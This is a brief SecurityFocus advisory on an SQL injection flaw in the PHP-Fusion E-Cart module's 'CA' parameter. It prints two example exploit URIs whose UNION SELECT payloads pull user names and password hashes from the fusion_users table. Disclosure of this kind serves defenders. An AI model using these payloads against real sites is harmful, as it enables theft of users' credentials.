PHP-Fusion E-Cart Module 'CA' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
http://www.example.com/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus